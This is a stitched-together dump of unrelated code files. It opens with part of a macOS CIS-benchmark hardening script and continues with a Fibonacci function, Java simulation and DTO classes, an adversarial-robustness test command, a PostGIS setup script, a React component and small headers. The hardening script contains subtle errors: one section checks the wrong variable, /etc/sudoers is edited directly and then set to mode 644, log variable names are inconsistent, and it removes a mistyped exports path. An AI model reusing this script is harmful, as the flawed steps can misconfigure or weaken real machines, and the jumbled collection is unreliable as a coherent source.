client # If client fails, then remediate if [ "$Audit2_8" = "1" ]; then defaults write /Library/Preferences/com.apple.driver.AppleIRController DeviceEnabled -bool false echo "$(date -u)" "2.8 remediated" | tee -a "$logFile" fi # 2.9 Enable Secure Keyboard Entry in terminal.app # Verify organizational score Audit2_9="$(defaults read "$plistlocation" OrgScore2_9)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_9" = "1" ]; then defaults write /Users/"$currentUser"/Library/Preferences/com.apple.Terminal SecureKeyboardEntry -bool true echo "$(date -u)" "2.9 remediated" | tee -a "$logFile" fi # 2.12 Disable "Wake for network access" # Verify organizational score Audit2_12="$(defaults read "$plistlocation" OrgScore2_12)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_12" = "1" ]; then pmset -a womp 0 pmset -a powernap 0 echo "$(date -u)" "2.12 remediated" | tee -a "$logFile" fi # 3.1 Enable security auditing # Verify organizational score Audit3_1="$(defaults read "$plistlocation" OrgScore3_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit3_2" = "1" ]; then echo "$(date -u)" "Checking 3.2" | tee -a "$logFile" auditdEnabled=$(launchctl list | grep -c auditd) if [ "$auditdEnabled" -gt "0" ]; then echo "$(date -u)" "3.1.3 passed" | tee -a "$logFile"; else launchctl load -w /System/Library/LaunchDaemons/com.apple.auditd.plist echo "$(date -u)" "3.2 remediated" | tee -a "$logFile" fi fi # 3.2 Configure Security Auditing Flags # Verify organizational score Audit3_2="$(defaults read "$plistlocation" OrgScore3_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit3_2" = "1" ]; then cp /etc/security/audit_control /etc/security/audit_control_old sed "s/"flags:lo,aa"/"flags:lo,ad,fd,fm,-all"/g" /etc/security/audit_control_old > /etc/security/audit_control chmod 644 /etc/security/audit_control chown root:wheel /etc/security/audit_control echo "$(date -u)" "3.2 remediated" | tee -a "$logFile" fi # 3.3 Ensure security auditing retention # Verify organizational score Audit3_3="$(defaults read "$plistlocation" OrgScore3_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit3_3" = "1" ]; then cp /etc/security/audit_control /etc/security/audit_control_old oldExpireAfter=$(cat /etc/security/audit_control | egrep expire-after) sed "s/${oldExpireAfter}/expire-after:60d OR 1G/g" /etc/security/audit_control_old > /etc/security/audit_control chmod 644 /etc/security/audit_control chown root:wheel /etc/security/audit_control echo "$(date -u)" "3.3 remediated" | tee -a "$logfile" fi # 3.5 Retain install.log for 365 or more days # Verify organizational score Audit3_5="$(defaults read "$plistlocation" OrgScore3_5)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit3_5" = "1" ]; then installRetention="$(grep -i ttl /etc/asl/com.apple.install | awk -F'ttl=' '{print $2}')" if [[ "$installRetention" = "" ]]; then mv /etc/asl/com.apple.install /etc/asl/com.apple.install.old sed '$s/$/ ttl=365/' /etc/asl/com.apple.install.old > /etc/asl/com.apple.install chmod 644 /etc/asl/com.apple.install chown root:wheel /etc/asl/com.apple.install echo "$(date -u)" "3.5 remediated" | tee -a "$logfile" else if [[ "$installRetention" -lt "365" ]]; then mv /etc/asl/com.apple.install /etc/asl/com.apple.install.old sed "s/"ttl=$installRetention"/"ttl=365"/g" /etc/asl/com.apple.install.old > /etc/asl/com.apple.install chmod 644 /etc/asl/com.apple.install chown root:wheel /etc/asl/com.apple.install echo "$(date -u)" "3.5 remediated" | tee -a "$logfile" fi fi fi # 3.6 Ensure firewall is configured to log # Verify organizational score Audit3_6="$(defaults read "$plistlocation" OrgScore3_6)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit3_6" = "1" ]; then /usr/libexec/ApplicationFirewall/socketfilterfw --setloggingmode on echo "$(date -u)" "3.6 remediated" | tee -a "$logFile" fi # 4.1 Disable Bonjour advertising service # Verify organizational score Audit4_1="$(defaults read "$plistlocation" OrgScore4_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit4_1" = "1" ]; then defaults write /Library/Preferences/com.apple.mDNSResponder.plist NoMulticastAdvertisements -bool true echo "$(date -u)" "4.1 remediated" | tee -a "$logFile" fi # 4.2 Enable "Show Wi-Fi status in menu bar" # Verify organizational score Audit4_2="$(defaults read "$plistlocation" OrgScore4_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit4_2" = "1" ]; then open "/System/Library/CoreServices/Menu Extras/AirPort.menu" echo "$(date -u)" "4.2 remediated" | tee -a "$logFile" fi # 4.4 Ensure http server is not running # Verify organizational score Audit4_4="$(defaults read "$plistlocation" OrgScore4_4)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit4_4" = "1" ]; then apachectl stop defaults write /System/Library/LaunchDaemons/org.apache.httpd Disabled -bool true echo "$(date -u)" "4.4 remediated" | tee -a "$logFile" fi # 4.5 Ensure nfs server is not running # Verify organizational score Audit4_5="$(defaults read "$plistlocation" OrgScore4_5)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit4_5" = "1" ]; then nfsd disable rm -rf /etc/export echo "$(date -u)" "4.5 remediated" | tee -a "$logFile" fi # 5.1.1 Secure Home Folders # Verify organizational score Audit5_1_1="$(defaults read "$plistlocation" OrgScore5_1_1)" # If organizational score is 1 or true, check status of client if [ "$Audit5_1_1" = "1" ]; then # If client fails, then remediate IFS=$'\n' for userDirs in $( find /Users -mindepth 1 -maxdepth 1 -type d -perm -1 | grep -v "Shared" | grep -v "Guest" ); do chmod og-rwx "$userDirs" done echo "$(date -u)" "5.1.1 enforced" | tee -a "$logFile" unset IFS fi # 5.1.2 Check System Wide Applications for appropriate permissions # Verify organizational score Audit5_1_2="$(defaults read "$plistlocation" OrgScore5_1_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_1_2" = "1" ]; then IFS=$'\n' for apps in $( find /Applications -iname "*\.app" -type d -perm -2 ); do chmod -R o-w "$apps" done echo "$(date -u)" "5.1.2 enforced" | tee -a "$logFile" unset IFS fi # 5.1.3 Check System folder for world writable files # Verify organizational score Audit5_1_3="$(defaults read "$plistlocation" OrgScore5_1_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_1_3" = "1" ]; then IFS=$'\n' for sysPermissions in $( find /System -type d -perm -2 | grep -v "Public/Drop Box" ); do chmod -R o-w "$sysPermissions" done echo "$(date -u)" "5.1.3 enforced" | tee -a "$logFile" unset IFS fi # 5.1.4 Check Library folder for world writable files # Verify organizational score Audit5_1_4="$(defaults read "$plistlocation" OrgScore5_1_4)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_1_4" = "1" ]; then # Exempts Adobe files by default! # for libPermissions in $( find /Library -type d -perm -2 -ls | grep -v Caches ); do IFS=$'\n' for libPermissions in $( find /Library -type d -perm -2 | grep -v Caches | grep -v Adobe | grep -v VMware); do chmod -R o-w "$libPermissions" done echo "$(date -u)" "5.1.4 enforced" | tee -a "$logFile" unset IFS fi # 5.3 Reduce the sudo timeout period # Verify organizational score Audit5_3="$(defaults read "$plistlocation" OrgScore5_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_3" = "1" ]; then echo "Defaults timestamp_timeout=0" >> /etc/sudoers echo "$(date -u)" "5.3 remediated" | tee -a "$logFile" fi # 5.4 Use a separate timestamp for each user/tty combo # Verify organizational score Audit5_4="$(defaults read "$plistlocation" OrgScore5_4)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_4" = "1" ]; then sed -i ".old" '/Default !tty_tickets/d' /etc/sudoers chmod 644 /etc/sudoers chown root:wheel /etc/sudoers echo "$(date -u)" "5.4 remediated" | tee -a "$logFile" fi # 5.5 Automatically lock the login keychain for inactivity # 5.6 Ensure login keychain is locked when the computer sleeps # If both 5.5 and 5.6 need to be set, both commands must be run at the same time # Verify organizational score Audit5_5="$(defaults read "$plistlocation" OrgScore5_5)" Audit5_6="$(defaults read "$plistlocation" OrgScore5_6)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_5" = "1" ] && [ "$Audit5_6" = 1 ]; then echo "$(date -u)" "Checking 5.5 and 5.6" | tee -a "$logFile" security set-keychain-settings -l -u -t 21600s /Users/"$currentUser"/Library/Keychains/login.keychain echo "$(date -u)" "5.5 and 5.6 remediated" | tee -a "$logFile" elif [ "$Audit5_5" = "1" ] && [ "$Audit5_6" = 0 ]; then echo "$(date -u)" "Checking 5.5" | tee -a "$logFile" security set-keychain-settings -u -t 21600s /Users/"$currentUser"/Library/Keychains/login.keychain echo "$(date -u)" "5.5 remediated" | tee -a "$logFile" elif [ "$Audit5_5" = "0" ] && [ "$Audit5_6" = 1 ]; then echo "$(date -u)" "Checking 5.6" | tee -a "$logFile" security set-keychain-settings -l /Users/"$currentUser"/Library/Keychains/login.keychain echo "$(date -u)" "5.6 remediated" | tee -a "$logFile" fi # 5.7 Do not enable the "root" account # Verify organizational score Audit5_7="$(defaults read "$plistlocation" OrgScore5_7)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_7" = "1" ]; then dscl . -create /Users/root UserShell /usr/bin/false echo "$(date -u)" "5.7 remediated" | tee -a "$logFile" fi # 5.8 Disable automatic login # Verify organizational score Audit5_8="$(defaults read "$plistlocation" OrgScore5_8)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_8" = "1" ]; then defaults delete /Library/Preferences/com.apple.loginwindow autoLoginUser echo "$(date -u)" "5.8 remediated" | tee -a "$logFile" fi # 5.9 Require a password to wake the computer from sleep or screen saver # Verify organizational score Audit5_9="$(defaults read "$plistlocation" OrgScore5_9)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_9" = "1" ]; then defaults write /Users/"$currentUser"/Library/Preferences/com.apple.screensaver askForPassword -int 1 echo "$(date -u)" "5.9 remediated" | tee -a "$logFile" fi # 5.10 Ensure system is set to hibernate # Verify organizational score Audit5_10="$(defaults read "$plistlocation" OrgScore5_10)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_10" = "1" ]; then pmset -a standbydelayhigh 600 pmset -a highstandbythreshold 90 pmset -a highstandbythreshold 90 pmset -a destroyfvkeyonstandby 1 echo "$(date -u)" "5.10 remediated" | tee -a "$logFile" fi # 5.11 Require an administrator password to access system-wide preferences # Verify organizational score Audit5_11="$(defaults read "$plistlocation" OrgScore5_11)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_11" = "1" ]; then security authorizationdb read system.preferences > /tmp/system.preferences.plist /usr/libexec/PlistBuddy -c "Set :shared false" /tmp/system.preferences.plist security authorizationdb write system.preferences < /tmp/system.preferences.plist echo "$(date -u)" "5.11 remediated" | tee -a "$logFile" fi # 5.12 Disable ability to login to another user's active and locked session # Verify organizational score Audit5_12="$(defaults read "$plistlocation" OrgScore5_12)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_12" = "1" ]; then /usr/bin/security authorizationdb write system.login.screensaver "use-login-window-ui" echo "$(date -u)" "5.12 remediated" | tee -a "$logFile" fi # 5.13 Create a custom message for the Login Screen # Verify organizational score Audit5_13="$(defaults read "$plistlocation" OrgScore5_13)" # If organizational score is 1 or true, check status of client if [ "$Audit5_13" = "1" ]; then PolicyBannerText="CIS mandated Login Window banner" defaults write /Library/Preferences/com.apple.loginwindow.plist LoginwindowText -string "$PolicyBannerText" echo "$(date -u)" "5.13 remediated" | tee -a "$logFile" fi # 5.14 Create a Login window banner # Policy Banner https://support.apple.com/en-us/HT202277 # Verify organizational score Audit5_14="$(defaults read "$plistlocation" OrgScore5_14)" # If organizational score is 1 or true, check status of client if [ "$Audit5_14" = "1" ]; then PolicyBannerText="CIS mandated Login Window banner" /bin/echo "$PolicyBannerText" > "/Library/Security/PolicyBanner.txt" /bin/chmod 755 "/Library/Security/PolicyBanner."* echo "$(date -u)" "5.14 remediated" | tee -a "$logFile" fi # 5.15 Do not enter a password-related hint (Not Scored) # 5.16 Disable Fast User Switching (Not Scored) # Verify organizational score Audit5_16="$(defaults read "$plistlocation" OrgScore5_16)" # If organizational score is 1 or true, check status of client if [ "$Audit5_16" = "1" ]; then defaults write /Library/Preferences/.GlobalPreferences MultipleSessionEnabled -bool false echo "$(date -u)" "5.16 remediated" | tee -a "$logFile" fi # 5.19 System Integrity Protection status # Verify organizational score Audit5_19="$(defaults read "$plistlocation" OrgScore5_19)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_19" = "1" ]; then echo "This tool needs to be executed from the Recovery OS." #/usr/bin/csrutil enable #echo "$(date -u)" "5.19 remediated" | tee -a "$logFile" fi # 6.1.1 Display login window as name and password # Verify organizational score Audit6_1_1="$(defaults read "$plistlocation" OrgScore6_1_1)" # If organizational score is 1 or true, check status of client if [ "$Audit6_1_1" = "1" ]; then defaults write /Library/Preferences/com.apple.loginwindow SHOWFULLNAME -bool true echo "$(date -u)" "6.1.1 remediated" | tee -a "$logFile" fi # 6.1.2 Disable "Show password hints" # Verify organizational score Audit6_1_2="$(defaults read "$plistlocation" OrgScore6_1_2)" # If organizational score is 1 or true, check status of client if [ "$Audit6_1_2" = "1" ]; then defaults write /Library/Preferences/com.apple.loginwindow RetriesUntilHint -int 0 echo "$(date -u)" "6.1.2 remediated" | tee -a "$logFile" fi # 6.1.3 Disable guest account # Verify organizational score Audit6_1_3="$(defaults read "$plistlocation" OrgScore6_1_3)" # If organizational score is 1 or true, check status of client if [ "$Audit6_1_3" = "1" ]; then defaults write /Library/Preferences/com.apple.loginwindow.plist GuestEnabled -bool false echo "$(date -u)" "6.1.3 remediated" | tee -a "$logFile" fi # 6.1.4 Disable "Allow guests to connect to shared folders" # Verify organizational score Audit6_1_4="$(defaults read "$plistlocation" OrgScore6_1_4)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit6_1_4" = "1" ]; then echo "$(date -u)" "Checking 6.1.4" | tee -a "$logFile" afpGuestEnabled="$(defaults read /Library/Preferences/com.apple.AppleFileServer guestAccess)" smbGuestEnabled="$(defaults read /Library/Preferences/SystemConfiguration/com.apple.smb.server AllowGuestAccess)" if [ "$afpGuestEnabled" = "1" ]; then defaults write /Library/Preferences/com.apple.AppleFileServer guestAccess -bool no echo "$(date -u)" "6.1.4 remediated" | tee -a "$logFile"; fi if [ "$smbGuestEnabled" = "1" ]; then defaults write /Library/Preferences/SystemConfiguration/com.apple.smb.server AllowGuestAccess -bool no echo "$(date -u)" "6.1.4 remediated" | tee -a "$logFile"; fi fi # 6.1.5 Remove Guest home folder # Verify organizational score Audit6_1_5="$(defaults read "$plistlocation" OrgScore6_1_5)" # If organizational score is 1 or true, check status of client if [ "$Audit6_1_5" = "1" ]; then rm -rf /Users/Guest echo "$(date -u)" "6.1.5 remediated" | tee -a "$logFile" fi # 6.2 Turn on filename extensions # Verify organizational score Audit6_2="$(defaults read "$plistlocation" OrgScore6_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit6_2" = "1" ]; then sudo -u "$currentUser" defaults write NSGlobalDomain AppleShowAllExtensions -bool true pkill -u "$currentUser" Finder echo "$(date -u)" "6.2 remediated" | tee -a "$logFile" # defaults write /Users/"$currentUser"/Library/Preferences/.GlobalPreferences.plist AppleShowAllExtensions -bool true fi # 6.3 Disable the automatic run of safe files in Safari # Verify organizational score Audit6_3="$(defaults read "$plistlocation" OrgScore6_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit6_3" = "1" ]; then /usr/libexec/PlistBuddy -c "Set :AutoOpenSafeDownloads bool false" /Users/"$currentUser"/Library/Containers/com.apple.Safari/Data/Library/Preferences/com.apple.Safari.plist echo "$(date -u)" "6.3 remediated" | tee -a "$logFile" fi echo "$(date -u)" "Remediation complete" | tee -a "$logFile" echo "continue" exit 0
def find_fibonacci(N): if N == 0 or N == 1: return N else: a = 0 b = 1 for i in range(2, N+1): c = a + b a = b b = c return c # Example Usage N = 8 print(find_fibonacci(N)) # 21
package cn.icepear.dandelion.upm.api.domain.dto; import lombok.Data; import lombok.EqualsAndHashCode; import lombok.NoArgsConstructor; /** * @author rim-wood * @description 部门树 * @date Created on 2019-04-18. */ @Data @EqualsAndHashCode(callSuper = true) @NoArgsConstructor public class DeptTree extends TreeNode<DeptTree> { private String deptName; /** * 部门类型 */ private String deptType; /** * 排序 */ private Integer sortOrder; /** * 是否删除 1:已删除 0:正常 */ private int delFlag; public DeptTree(String deptName, String deptType, Integer sortOrder, int delFlag) { super(); this.deptName = deptName; this.deptType = deptType; this.sortOrder = sortOrder; this.delFlag = delFlag; } }
python tools/adv_test_cifar.py --model_path ./results/defense_0.1_0.1/robust_model_g_epoch82.pth --vae_path ./results/defense_0.1_0.1/robust_vae_epoch82.pth --batch_size 256 \ "NoAttack()" \ "AutoLinfAttack(cd_vae, 'cifar', bound=8/255)" \ "AutoL2Attack(cd_vae, 'cifar', bound=1.0)" \ "JPEGLinfAttack(cd_vae, 'cifar', bound=0.125, num_iterations=100)" \ "StAdvAttack(cd_vae, num_iterations=100)" \ "ReColorAdvAttack(cd_vae, num_iterations=100)"
<gh_stars>1-10 package edu.mtu.cabals.model.marketplace; import java.awt.Point; import java.util.ArrayList; import java.util.Arrays; import java.util.List; import org.javatuples.Pair; import ec.util.MersenneTwisterFast; import edu.mtu.cabals.model.Parameters; import edu.mtu.cabals.model.TimberMarketplace; import edu.mtu.cabals.model.WupModel; import edu.mtu.environment.Forest; import edu.mtu.environment.NlcdClassification; import edu.mtu.environment.Stand; import edu.mtu.steppables.LandUseGeomWrapper; import edu.mtu.utilities.Constants; import edu.mtu.utilities.Precision; import sim.field.geo.GeomGridField; import sim.field.grid.IntGrid2D; /** * Harvesters (e.g., CF and NIPF) both share the same way of harvesting. */ public abstract class Harvester { // TODO Update the range for the variable mark-up to be set via the INI file // Multiplier to go from dry to green ton, based on Dulys-Nusbaum et al., 2019 public final static double DryToGreen = 2; private double annualLimit; private double markup; private double woodyBiomassRetention; private MersenneTwisterFast random; private HarvestReport annualReport = new HarvestReport(); private class Cell { public ArrayList<Point> points = new ArrayList<Point>(); } /** * Find the most mature patch in the given parcel that matches the size. * * @param lu The geometry used to map the bounds. * @param parcel The parcel to examine. * @param patch The size (ha) of the patch to be harvested. * @param dbh The minimum DBH (cm) of the trees. * @return The points in the patch, or null if a match cannot be found. */ protected List<Point> findPatch(final LandUseGeomWrapper lu, Point[] parcel, double patch, double dbh) { // If the patch is greater than or equal to the size of the parcel, just return it Forest forest = Forest.getInstance(); double pixel = forest.getPixelArea(); // sq.m double area = (parcel.length * pixel) / Constants.SquareMetersToHectares; if (area <= patch) { return Arrays.asList(parcel); } // The bounding rectangle of the agent's parcel converted to an IntGrid2D index (min and max) GeomGridField cover = Forest.getInstance().getLandCover(); int xMin = cover.toXCoord(lu.geometry.getEnvelopeInternal().getMinX()); int yMin = cover.toYCoord(lu.geometry.getEnvelopeInternal().getMinY()); int xMax = cover.toXCoord(lu.geometry.getEnvelopeInternal().getMaxX()); int yMax = cover.toYCoord(lu.geometry.getEnvelopeInternal().getMaxY()); // Use the bounds to setup our grids double divisor = (int)Math.ceil(Constants.SquareMetersToHectares / pixel); // ha / sq.m int xBound = (int)Math.ceil(Math.abs(xMin - xMax) / divisor) + 1; int yBound = (int)Math.ceil(Math.abs(yMin - yMax) / divisor) + 1; Cell[][] patches = new Cell[xBound][yBound]; for (int ndx = 0; ndx < xBound; ndx++) { for (int ndy = 0; ndy < yBound; ndy++) { patches[ndx][ndy] = new Harvester.Cell(); } } double[][] meanDbh = new double[xBound][yBound]; // Since we don't really care about the orientation of the map, make sure we are // using the actual minimum values xMin = Math.min(xMin, xMax); yMin = Math.min(yMin, yMax); // Iterate through the points, sum the DBH and assign points to patches for (Point point : parcel) { int x = (int)Math.floor(Math.abs(point.x - xMin) / divisor); int y = (int)Math.floor(Math.abs(point.y - yMin) / divisor); patches[x][y].points.add(point); Stand stand = forest.getStand(point); // If this point is woody wetlands then don't assign any value if (stand.nlcd == NlcdClassification.WoodyWetlands.getValue()) { continue; } // Only add the DBH if it is greater than or equal to our target // minimum. This also introduces a penalty for the square when // it contains a significant number of lower value stands if (stand.arithmeticMeanDiameter >= dbh) { meanDbh[x][y] += stand.arithmeticMeanDiameter; } } // Find the mean DBH and note the max int x = 0, y = 0; double max = Double.MIN_VALUE; for (int ndx = 0; ndx < meanDbh.length; ndx++) { for (int ndy = 0; ndy < meanDbh[ndx].length; ndy++) { // Find the average for the square, if it is less than our target // then set the square to zero to reserve it for another year meanDbh[ndx][ndy] /= patches[ndx][ndy].points.size(); if (meanDbh[ndx][ndy] < dbh) { meanDbh[ndx][ndy] = 0; continue; } // Check to see if this is a good starting point if (meanDbh[ndx][ndy] > max) { max = meanDbh[ndx][ndy]; x = ndx; y = ndy; } } } return findBest(patches, meanDbh, x, y, patch); } /** * Use a basic greedy algorithm to find the highest value patch from the current location. */ private List<Point> findBest(Cell[][] patches, double[][] meanDbh, int ndx, int ndy, double target) { // Note the pixel area and prepare double area = Forest.getInstance().getPixelArea(); List<Point> points = new ArrayList<Point>(); double harvest = 0; while (harvest < target) { // Copy the points over and update the harvest harvest += (patches[ndx][ndy].points.size() * area) / Constants.SquareMetersToHectares; points.addAll(patches[ndx][ndy].points); meanDbh[ndx][ndy] = 0; // Find the next harvest patch int x = 0, y = 0; double max = Double.MIN_VALUE; if (ndy != 0 && meanDbh[ndx][ndy - 1] > max) { max = meanDbh[ndx][ndy - 1]; x = ndx; y = ndy - 1; } if (ndx != 0 && meanDbh[ndx - 1][ndy] > max) { max = meanDbh[ndx - 1][ndy]; x = ndx - 1; y = ndy; } if ((ndx + 1) != meanDbh.length && meanDbh[ndx + 1][ndy] > max) { max = meanDbh[ndx + 1][ndy]; x = ndx + 1; y = ndy; } if ((ndy + 1) != meanDbh[ndx].length && meanDbh[ndx][ndy + 1] > max) { max = meanDbh[ndx][ndy + 1]; x = ndx; y = ndy + 1; } // Move ndx = x; ndy = y; // Exit if we didn't move if (max == Double.MIN_VALUE) { break; } } return points; } /** * Harvest the given patch. * * @param lu The parcel that the patch is in. * @param patch The points that make up the patch. * @return The report on the harvest. */ protected HarvestReport harvest(LandUseGeomWrapper lu, List<Point> patch) { // Get the reference GIS files IntGrid2D visualBuffer = WupModel.getVisualBuffer(); IntGrid2D wetlands = (IntGrid2D)Forest.getInstance().getLandCover().getGrid(); // Perform the initial harvest of the patch Forest forest = Forest.getInstance(); Pair<Double, Double> results = forest.harvest(patch.toArray(new Point[0])); // Update the report with the results of the harvest HarvestReport report = new HarvestReport(); double area = forest.getPixelArea(); report.biomass = (results.getValue1() / Constants.KilogramToMetricTon) * DryToGreen; // Above Ground dry kg to green tons report.merchantable = (results.getValue0() / Constants.KilogramToMetricTon) * DryToGreen; // Stem dry kg converted to green tons report.cwd = report.biomass - report.merchantable; // Above ground woody biomass green tons report.harvestedArea = (patch.size() * area) / Constants.SquareMetersToHectares; // sq.m to ha // Check to see what the impacts are via GIS final int wetlandsCode = NlcdClassification.WoodyWetlands.getValue(); for (Point point : patch) { if (visualBuffer.get(point.x, point.y) == 0) { report.visualImpact += area; } if (wetlands.get(point.x, point.y) == wetlandsCode) { report.wetlandImpact += area; } } report.visualImpact /= Constants.SquareMetersToHectares; // sq.m to ha report.wetlandImpact /= Constants.SquareMetersToHectares; // sq.m to ha // Apply the economic calculations report.labor = harvestDuration(report.merchantable); report.biomassRecoverable = report.cwd * (1 - woodyBiomassRetention); // Apply the biomass costs and return biomassCosts(report, lu.getDoubleAttribute("NEAR_KM")); return report; } // Calculate how long we expect the harvest to take, rounded to the near nearest hundreds place private double harvestDuration(double merchantable) { Parameters parameters = WupModel.getParameters(); double hours = merchantable / parameters.getMerchantableProductivity(); return Precision.round(hours, 2); } // Calculate the costs associated with harvesting the biomass private void biomassCosts(HarvestReport report, double distance) { Parameters parameters = WupModel.getParameters(); report.loggerHours = Precision.round(report.biomassRecoverable / parameters.getBiomassChipping(), 2); double loggerPay = report.loggerHours * parameters.getLoggerPerHour(); double totalDistance = Transporter.getTotalDistance(distance, report.biomassRecoverable); report.driverHours = Precision.round(totalDistance / parameters.getKmPerHour(), 2); double driverPay = report.driverHours * parameters.getDriverPerHour(); double fuelCost = report.loggerHours * parameters.getChipperFuel() * parameters.getDieselPerLiter(); fuelCost += (totalDistance / parameters.getKmPerLiter()) * parameters.getDieselPerLiter(); report.biomassCost = Precision.round(loggerPay + driverPay + fuelCost, 2); } /** * Get the report of harvesting. */ public HarvestReport report() { return annualReport; } /** * Request a bit from the harvester for the given parcel and patch size. * * @param lu The geometry used to map the bounds. * @param parcel The parcel to request the bid on. * @param patch The size (ha) of the patch to be harvested. * @param dbh The minimum DBH of the harvest. * @return The bid and the patch being bid on. */ public HarvestBid requestBid(LandUseGeomWrapper lu, Point[] parcel, double patch, double dbh) { // Find a patch with the given size HarvestBid bid = new HarvestBid(); List<Point> points = findPatch(lu, parcel, patch, dbh); if (points == null || points.size() == 0) { return bid; } // Prepare the bid bid.patch = points; // Calculate the stumpage Forest forest = Forest.getInstance(); TimberMarketplace marketplace = TimberMarketplace.getInstance(); for (Point point : points) { Stand stand = forest.getStand(point); double marketPrice = marketplace.calculateBid(stand); bid.bid += marketPrice; } // Return the bid return bid; } /** * Reset the harvest report. */ public void reset() { annualReport = new HarvestReport(); } /** * Update the annual harvest report with the harvest. */ protected void update(HarvestReport harvest, boolean biomassCollected) { annualReport.biomass += harvest.biomass; annualReport.merchantable += harvest.merchantable; annualReport.cwd += harvest.cwd; annualReport.harvestedArea += harvest.harvestedArea; annualReport.visualImpact += harvest.visualImpact; annualReport.wetlandImpact += harvest.wetlandImpact; annualReport.labor += harvest.labor; if (biomassCollected) { annualReport.biomassRecoverable += harvest.biomassRecoverable; annualReport.loggerHours += harvest.loggerHours; annualReport.driverHours += harvest.driverHours; } } protected double getAnnualHarvestLimit() { return annualLimit; } protected double getMarkup() { // If the mark-up was set, return it if (markup != 0) { return markup; } // Calculate a random value and return it int value = 5 + random.nextInt(15); return 1 + (double)value / 100.0; } protected double getWoodyBiomassRetention() { return woodyBiomassRetention; } /** * Set the annual limit to the number of hours NIPFs can harvest. */ public void setAnnualHarvestLimit(double value) { annualLimit = value; } /** * Set the margin for woody biomass profits. */ public void setMarkup(double value) { markup = value; } /** * Set the random number generator. */ public void setRandom(MersenneTwisterFast value) { random = value; } /** * Set the quantity of woody biomass that must be retained on site. */ public void setWoodyBiomassRetention(double value) { woodyBiomassRetention = value; } }
import re def parse_field_descriptors(code_snippet): field_descriptors = [] fields = re.findall(r"(\w+)=(.*?)(?=(\w+=)|\))", code_snippet) field_descriptor = {} for field in fields: key = field[0].strip() value = field[1].strip().strip(",") if value.startswith("_b"): value = value[4:-2] elif value.startswith("DESCRIPTOR"): value = value.strip(")") elif value.lower() == "none": value = None elif value.lower() == "false": value = False elif value.lower() == "true": value = True else: try: value = int(value) except ValueError: pass field_descriptor[key] = value if key == "file": field_descriptors.append(field_descriptor) field_descriptor = {} return field_descriptors
#!/bin/bash #defines NC='\033[0m' RED='\033[0;31m' GREEN='\033[0;32m' ### Setup database psql -h ${POSTGIS_HOSTNAME} -U ${POSTGIS_USER} \ -c "DROP DATABASE IF EXISTS ${DATABASE_NAME};" >/dev/null \ -c "COMMIT;" 2>&1 >/dev/null \ -c "CREATE DATABASE ${DATABASE_NAME} WITH ENCODING='UTF8' CONNECTION LIMIT=-1;" psql -h ${POSTGIS_HOSTNAME} -U ${POSTGIS_USER} -d ${DATABASE_NAME} \ -c "CREATE EXTENSION IF NOT EXISTS postgis;" 2>&1 >/dev/null \ -c "CREATE EXTENSION IF NOT EXISTS postgis_topology;" 2>&1 >/dev/null \ -c "CREATE EXTENSION IF NOT EXISTS postgis_sfcgal;" 2>&1 >/dev/null \ -c "CREATE EXTENSION IF NOT EXISTS hstore;" 2>&1 >/dev/null \ -c "ALTER DATABASE ${DATABASE_NAME} SET postgis.backend = geos;" 2>&1 >/dev/null printf "${GREEN}All done${NC}\n"
import React from 'react' export default function StarRating(props) { const stars = [0, 0, 0, 0, 0] let key = 0 stars.fill(1, 0, props.rating) if (!props.rating) { return <p>No reviews yet</p> } else if (props.showReviewNumber) { return ( <p> Rating:{' '} {stars.map(star => { if (star === 1) { return <span key={key++} className="fas fa-star" /> } else { return <span key={key++} className="far fa-star" /> } })}{' '} {props.reviews.length} {' reviews'} </p> ) } else { return ( <p> Rating:{' '} {stars.map(star => { if (star === 1) { return <span key={key++} className="fas fa-star" /> } else { return <span key={key++} className="far fa-star" /> } })} </p> ) } }
import type {MojoApp, MojoContext} from '../../../../../lib/types.js'; export default function helpersPlugin(app: MojoApp): void { app.addHelper('testHelper', testHelper); } async function testHelper(ctx: MojoContext, partial: string): Promise<string> { const language: string = ctx.models.bar.language(); return `${language} ${partial}`; }
// // Created by johnathan on 07/07/18. // #ifndef VSS_SIMULATOR_ICONTROLRECEIVERADAPTER_H #define VSS_SIMULATOR_ICONTROLRECEIVERADAPTER_H class IControlReceiverAdapter { public: virtual void loop() = 0; }; #endif //VSS_SIMULATOR_ICONTROLRECEIVERADAPTER_H
<filename>trunk/src/main/java/org/osgeo/proj4j/UnknownAuthorityCodeException.java package org.osgeo.proj4j; /** * Signals that an authority code is unknown * and cannot be mapped to a CRS definition. * * @author mbdavis * */ public class UnknownAuthorityCodeException extends Proj4jException { public UnknownAuthorityCodeException() { super(); } public UnknownAuthorityCodeException(String message) { super(message); } }
